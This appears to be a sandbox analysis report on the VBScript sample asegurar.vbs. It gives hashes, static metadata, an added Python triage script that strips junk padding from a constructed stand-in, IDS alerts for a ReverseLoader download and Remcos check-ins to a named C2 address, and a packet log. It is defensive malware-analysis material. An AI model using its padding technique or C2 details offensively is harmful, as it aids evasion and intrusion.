SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 82604
Entropy (8bit): 4.933268783138117
Encrypted: false
SSDEEP: 1536:yxkG9DytusrHiJZM2FeBZ0YNIIIlNsDf50jguaPCcl7wh6V8xPOr:M59Dpeir8ZRNIItzu4z7s+Br
MD5: E177873E2D842F08553C449F4758A4CE
SHA1: 91612A3524924E253495CBF1DD05AEFDFB118FFC
SHA-256: 970E00FFC2819C1F2D6FBE0C13E115B101F28108813B04ACFEE162043648E0EA
SHA-512: 2F38AC3FD5C68297DEA3538C74E327850F6CEC6C28326DA34FCD4AE7FCDD6D26DFE337498C5D44438006A231CDBA86DBB605F2CE3F8A66142600E50F13B447FC
Malicious: false
File type: Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
Entropy (8bit): 3.5702788509354697
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 66.67%
• MP3 audio (1001/1) 33.33%
File name: asegurar.vbs
File size: 15'016'182 bytes
MD5: aee210142f6411df0f3c0469d2a9df27
SHA1: 991b0e994e4da9f76bf9fd03bc3fef75dfd94590
SHA256: 3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
SHA512: 5199ec7836d07bfe4c48deb3d16993f45ffc9864c404330462f9698960f7a5272bc5a7fff56f4a0d9afa9df2c01271cd0b303004f874797e20ec997c3f55fae3
SSDEEP: 1536:lyyyyyyyyyyyyyyyyyyyyyyyryyyyyyyyyyyyyyyyyyyyyyycyyyyyyyyyyyyyyz:TZ5U
TLSH: A1E60113A759EF30DF56387370D37B975261E3BA199C489C60E8822828C59A347D1BFE
File Content Preview: ..........'. .4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4
Icon Hash: 68d69b8f86ab9a86
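The static information above describes a 15 MB UTF-16LE script whose SSDEEP is almost entirely one character and whose content preview is a short byte pattern repeated over and over: a small script padded with junk to defeat upload size limits and fuzzy hashing. TrID's 33% "MP3 audio" guess shows that magic-based file typing is no help here; the BOM and the encoding are what matter. The Python below is an added example, not code from the report or from the sample. It builds a constructed stand-in (a three-line script buried in thousands of identical VBScript comment lines, BOM-prefixed UTF-16LE), picks the byte order from the BOM, strips the dominant repeated line when it accounts for most of the file, and reports how far the bytes deflate. The padding line, the script text and the assumption that the padding is line-structured are all invented for the example; the real padding unit cannot be recovered from the dotted preview.

```python
"""Peel a junk-padded UTF-16 VBScript down to its payload and measure how padded it is."""
import zlib
from collections import Counter

# Constructed stand-in for asegurar.vbs (not the real sample): a three-line script
# surrounded by thousands of identical comment lines, saved as UTF-16LE with a BOM.
# The padding line itself is invented; the real unit is not recoverable from the preview.
PAD_LINE = "' 4\"0@ @ @"
SCRIPT = [
    "Dim s",
    's = "constructed stand-in for the real payload"',
    "WScript.Echo s",
]


def build_sample(pad_lines: int = 5000) -> bytes:
    lines = [PAD_LINE] * pad_lines + SCRIPT + [PAD_LINE] * pad_lines
    return b"\xff\xfe" + ("\r\n".join(lines) + "\r\n").encode("utf-16-le")


def decode_script(data: bytes) -> str:
    """Choose the UTF-16 byte order from the BOM; the report says little-endian,
    so that is the fallback when no BOM is present."""
    if data[:2] == b"\xff\xfe":
        return data[2:].decode("utf-16-le", errors="replace")
    if data[:2] == b"\xfe\xff":
        return data[2:].decode("utf-16-be", errors="replace")
    return data.decode("utf-16-le", errors="replace")


def triage(data: bytes, pad_threshold: float = 0.5) -> dict:
    """Drop the single most repeated line if it makes up more than pad_threshold of
    all lines, and report compressibility: a multi-megabyte file that deflates to
    a few kilobytes is padding, whatever TrID calls it."""
    lines = decode_script(data).splitlines()
    counts = Counter(lines)
    top_line, top_hits = counts.most_common(1)[0]
    padding_fraction = top_hits / len(lines)
    if padding_fraction > pad_threshold:
        payload = [ln for ln in lines if ln != top_line and ln.strip()]
    else:
        payload = [ln for ln in lines if ln.strip()]
    return {
        "size": len(data),
        "deflate_ratio": len(zlib.compress(data, 9)) / len(data),
        "unique_lines": len(counts),
        "padding_fraction": padding_fraction,
        "payload": payload,
    }


if __name__ == "__main__":
    result = triage(build_sample())
    print({k: v for k, v in result.items() if k != "payload"})
    print("\n".join(result["payload"]))
```

The threshold matters: a genuine script with one line that happens to repeat should not lose it, so padding is only stripped when a single line dominates the file. Deflate ratio and unique-line count are the two numbers worth keeping as triage features alongside the entropy the report already gives.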
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T07:41:19.134483+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP
2024-10-31T07:41:19.521177+0100 | 2020423 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:19.521177+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:21.752336+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
2024-10-31T07:41:22.031540+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49741 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:23.610045+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49742 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:25.190506+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49743 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:26.756293+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49744 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:28.312938+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49745 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:29.875749+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49746 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:31.453622+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49747 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:33.953405+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49748 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:35.531715+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49749 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:37.109960+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49750 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:38.675448+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49751 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:40.234871+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49752 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:41.817111+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49753 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:43.391319+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49754 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:44.969400+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49755 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:46.532179+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49756 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:48.095206+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49757 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:49.656958+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49758 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:51.220517+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49759 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:52.815631+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49760 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:54.375581+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49761 | 181.236.112.169 | 2001 | TCP
                                                                                              2024-10-31T07:41:55.937978+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449762181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:57.672426+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449764181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:59.250597+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449766181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:00.815279+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449777181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:02.376348+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449783181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:03.938417+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449794181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:05.500475+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449805181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:07.079178+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449816181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:08.657245+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449824181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:10.238744+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449833181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:11.813179+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449844181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:13.377766+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449853181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:14.938356+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449861181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:16.438779+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449872181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:17.918640+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449881181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:19.344349+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449889181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:20.766372+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449899181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:22.244555+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449910181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:23.625678+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449917181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:24.962289+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449923181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:26.266463+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449934181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:27.570771+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449940181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:28.844251+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449951181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:30.076346+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449957181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:31.297618+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449965181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:32.485126+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449974181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:33.657910+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449980181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:34.813151+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449989181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:35.954553+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449997181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:37.063222+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450003181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:38.157818+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450009181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:39.219852+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450018181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:40.270568+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450026181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:41.314003+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450032181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:42.344399+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450038181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:43.385290+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450044181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:44.375625+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450051181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:45.359620+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450058181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:46.329576+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450064181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:47.287882+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450067181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:48.219436+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450068181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:49.141592+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450069181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:50.063925+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450070181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:50.970039+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450071181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:51.875778+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450072181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:52.780861+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450073181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:53.641839+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450074181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:54.518547+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450075181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:55.398388+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450076181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:56.235002+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450077181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:57.176751+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450078181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:58.020953+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450079181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:58.829009+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450080181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:59.783941+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450081181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:00.580874+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450082181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:01.380012+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450083181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:02.178849+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450084181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:02.970527+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450085181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:03.737488+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450086181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:04.500479+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450087181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:05.470561+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450088181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:06.222550+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450089181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:06.974546+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450090181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:07.703876+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450091181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:08.442565+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450092181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:09.861260+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450093181.236.112.1692001TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Oct 31, 2024 07:41:17.323715925 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323738098 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323777914 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.323785067 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323820114 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.323879957 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442451954 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442475080 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442553043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442553043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442559004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442643881 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.487001896 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487020969 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487163067 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.487169981 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487337112 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.561517000 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561536074 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561660051 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.561666012 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561741114 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.679754972 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.679773092 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.679984093 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.679991007 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.680037022 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.724087000 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.724102020 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.724167109 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.724174023 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.725171089 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.799549103 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799571037 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799751043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.799757004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799798012 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.919424057 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.919440985 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.919507980 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.919518948 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.920187950 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.960861921 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.960880995 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.961039066 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.961045027 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.961085081 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036309004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036328077 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036365986 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036371946 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036393881 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036415100 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.080121994 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080137968 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080207109 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.080213070 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080252886 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155319929 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155334949 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155392885 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155400991 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155425072 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155432940 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197630882 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197685003 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197690964 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197700024 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197741985 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197973013 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.210391045 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210449934 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.210534096 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210756063 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210792065 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.828986883 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.829086065 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.831888914 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.831928015 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.832149029 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.833220005 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.879374981 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134493113 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134557962 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134587049 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134639025 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134638071 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134668112 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134680986 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134798050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134798050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134850025 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.164321899 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.164397955 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.164427996 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.213047028 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253137112 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253185987 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253211975 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253242970 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253267050 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253328085 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253546000 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253590107 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253612995 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253645897 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253662109 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253715038 CET49736443192.168.2.4188.114.97.3
